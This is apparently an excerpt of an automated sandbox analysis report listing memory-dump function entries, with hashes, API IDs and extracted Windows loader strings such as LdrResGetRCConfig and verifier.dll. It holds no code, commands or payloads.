                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$AddD
                                                                      • API String ID: 0-2525844869
                                                                      • Opcode ID: 6d997a7f4c5a3451735195315429e48e9be7e9be5a1483bb780549198ed37336
                                                                      • Instruction ID: f14d8618f25a83f63bb6e3dcf8aaad64e3694f03a8a34760532bbf1472d38a7c
                                                                      • Opcode Fuzzy Hash: 6d997a7f4c5a3451735195315429e48e9be7e9be5a1483bb780549198ed37336
                                                                      • Instruction Fuzzy Hash: 6BA16CB6504344AFD714CF29C845FABBBE9FB84748F504A2EF99486150E770E909CF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 36BBB5C4
                                                                      • RedirectedKey, xrefs: 36BBB60E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                      • API String ID: 0-1388552009
                                                                      • Opcode ID: ee8433523fb598d40e5d8a0f3003999067ce5d4ea8c77b5f055c1f289a03e614
                                                                      • Instruction ID: a6a67bcc8e26edb795d78de073cc15c202387b0f3020217147d41802c1e2abea
                                                                      • Opcode Fuzzy Hash: ee8433523fb598d40e5d8a0f3003999067ce5d4ea8c77b5f055c1f289a03e614
                                                                      • Instruction Fuzzy Hash: 046116B5C00228EFDF11DF95C988ADEBFB9FB08705F50405AE905A7250DBB49A46CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$$
                                                                      • API String ID: 3446177414-233714265
                                                                      • Opcode ID: 77155f121bd6f8928a5f9f5d8216b685595a1148379c280b185026f31f4114c4
                                                                      • Instruction ID: 9f4e7abb6ed90756282e95919bd41250baf9860700a099d35dfcbbcff9fb219f
                                                                      • Opcode Fuzzy Hash: 77155f121bd6f8928a5f9f5d8216b685595a1148379c280b185026f31f4114c4
                                                                      • Instruction Fuzzy Hash: 3061CC76E10749CBEB20DFA4CE80B9DBBB1FB04308F104469E9046F691DB76A941CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                      • API String ID: 0-118005554
                                                                      • Opcode ID: 84f219a385b70212c20330b9d2c987e71f1ce5ce90b63561d6d25ae6f5d5b179
                                                                      • Instruction ID: 801a6c93fd6575a7a35bdc6a3aa1fa13daa7ea1da8363ae87f4806edd564be47
                                                                      • Opcode Fuzzy Hash: 84f219a385b70212c20330b9d2c987e71f1ce5ce90b63561d6d25ae6f5d5b179
                                                                      • Instruction Fuzzy Hash: 3F31CB756187619BE311CF6ADC80B2AB7E8EF85754F010869FC648B390EB35D905CBA3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Local\$@
                                                                      • API String ID: 0-380025441
                                                                      • Opcode ID: be34c57075b2dada4aeacbb274e59af5f3ba6b645662474f46cdd64791f446e7
                                                                      • Instruction ID: 8d47fc55d14e89c5f07abbb61417e5b15910cdcc7b495fd0dd05d285c4612281
                                                                      • Opcode Fuzzy Hash: be34c57075b2dada4aeacbb274e59af5f3ba6b645662474f46cdd64791f446e7
                                                                      • Instruction Fuzzy Hash: 01319EB1509311AFE310DF28C980A5BBBE8EB85694F10092EF99483250E635DD08CFE3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36B5289F
                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 36B5289A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                      • API String ID: 0-2653619699
                                                                      • Opcode ID: fa7e6b305fdb19047838270d151b76027d9ea67af108a1db9d2aee364567224c
                                                                      • Instruction ID: aa4d4a098a757670ab51995ba01169deb6c3b14f6409b6fdb31715ebf49ca012
                                                                      • Opcode Fuzzy Hash: fa7e6b305fdb19047838270d151b76027d9ea67af108a1db9d2aee364567224c
                                                                      • Instruction Fuzzy Hash: E31129B6F01224FBF7158B89CD41F9B76A8DB84754F118029BA04DB244EA75DD008FB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: c3ce879e3857bfaa9f63f541abfaaea3b6927eb2c1b38dae30c859b75f8f61c9
                                                                      • Instruction ID: 6454717445b11a8d1657d471673f6a54a73494b404c9075011fdc146b85519f7
                                                                      • Opcode Fuzzy Hash: c3ce879e3857bfaa9f63f541abfaaea3b6927eb2c1b38dae30c859b75f8f61c9
                                                                      • Instruction Fuzzy Hash: 37B100B5A093908FD354CF28C980A5AFBF1BB88304F14496EF8999B352D771E845CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f3cb9b054775955dd165055b27a91548a4d0c59b1f142279a54e8a79917dbabf
                                                                      • Instruction ID: a9813558be0daa8b289608031e1c8a3d1962c038573cd018be5da9fb03997c9b
                                                                      • Opcode Fuzzy Hash: f3cb9b054775955dd165055b27a91548a4d0c59b1f142279a54e8a79917dbabf
                                                                      • Instruction Fuzzy Hash: 54815D71A00319AEDB21DFA6CC81EAFBBF8EF49714F100629E555E7190DA70E900CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f48fd0326de32981cb7624a7ef0edc768bdd170bdc5f44ae184b4cad29fa14e7
                                                                      • Instruction ID: 06c7bae095a6fd857703633547fd9d9f92c9e3c68a29fd5df102e430ae0cceec
                                                                      • Opcode Fuzzy Hash: f48fd0326de32981cb7624a7ef0edc768bdd170bdc5f44ae184b4cad29fa14e7
                                                                      • Instruction Fuzzy Hash: 61617075E00616AFDB08DF68C984A9DFBB5FF48345F25816AD819AB300DB34A941CFD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: verifier.dll
                                                                      • API String ID: 0-3265496382
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Flst
                                                                      • API String ID: 0-2374792617
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: 3aw3aw
                                                                      • API String ID: 3446177414-3668584392
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bd1ab570ff987ff3ed46d3007cab2ec68ee7507ced0b0e7f99582f13c184f62
                                                                      • Instruction ID: c9778a3e1f48b5f29d2df09d5bdc46d6810f76b93cc8436f1dd0ac53bc02c018
                                                                      • Opcode Fuzzy Hash: 4bd1ab570ff987ff3ed46d3007cab2ec68ee7507ced0b0e7f99582f13c184f62
                                                                      • Instruction Fuzzy Hash: A7713A71E10219AFEF15CFA4CC85FEEBBB9EB04350F104129EA14A7290D774AA45CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6315721bc5f94838bc3cb1aaef370c381564c35b7231934f52cbc53a27028fd2
                                                                      • Instruction ID: cfe516737b85cf765c82d9f9fbbb40df8111334af8c2b0193f931ba689d26cb4
                                                                      • Opcode Fuzzy Hash: 6315721bc5f94838bc3cb1aaef370c381564c35b7231934f52cbc53a27028fd2
                                                                      • Instruction Fuzzy Hash: 315158B4A18351DFE314CF29C49492ABBE5FF88744F20496EE9989B354DB30E844CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 097c26838d59c2fea120165e6cc24f999e7df1804c096c55b93b159e8f87c724
                                                                      • Instruction ID: e04ef0a82d133bbda558f2c123712de7dce09682828d9fffdc0f5cc2800ee4bd
                                                                      • Opcode Fuzzy Hash: 097c26838d59c2fea120165e6cc24f999e7df1804c096c55b93b159e8f87c724
                                                                      • Instruction Fuzzy Hash: 7D5102B1A003259FE320DF65CC94F9A7BF8EB447A4F11062DEA559B291DB34D801CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0653546b541dca9d67782fb188b3e629994d00d67007a739498cf1abe681a652
                                                                      • Instruction ID: 84aa1886bbf2ac885ee1827a44a6752cb718f665ca6a98b78dc88515d35f88c6
                                                                      • Opcode Fuzzy Hash: 0653546b541dca9d67782fb188b3e629994d00d67007a739498cf1abe681a652
                                                                      • Instruction Fuzzy Hash: 554124B5A40700ABE7259F69CD60B1AB7F9EF45760F21842AF9089F690DB30D841CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                      • Instruction ID: 368aae36f307cb507ee7bb0acbc1d1e8b9041955aac30a463f61efc88b971049
                                                                      • Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                      • Instruction Fuzzy Hash: 2251F8B66003229BDB119FA5CC40AEB77E5EF846C4F510A29FA40D7250EB35C856CFA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6d17479c56f98715b71f81fbc207d482938c184be39b15352aee96f909e89ff8
                                                                      • Instruction ID: e5752e7535481090edfe17613f9c4c7d11f23c789b9e0c085c1135b89306ba93
                                                                      • Opcode Fuzzy Hash: 6d17479c56f98715b71f81fbc207d482938c184be39b15352aee96f909e89ff8
                                                                      • Instruction Fuzzy Hash: 86517D709007989FE720CF66C884B9AFBF8FF54714F20462EE196A76A0D770A945CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f65516fbe3110939f63fdf97bca4ac777fdb51db122309c93308731a40eb1f1e
                                                                      • Instruction ID: 8389a6894c35c389ab44eb8c756ae0e30bea38eaa37874df8b658c8ddf2a92df
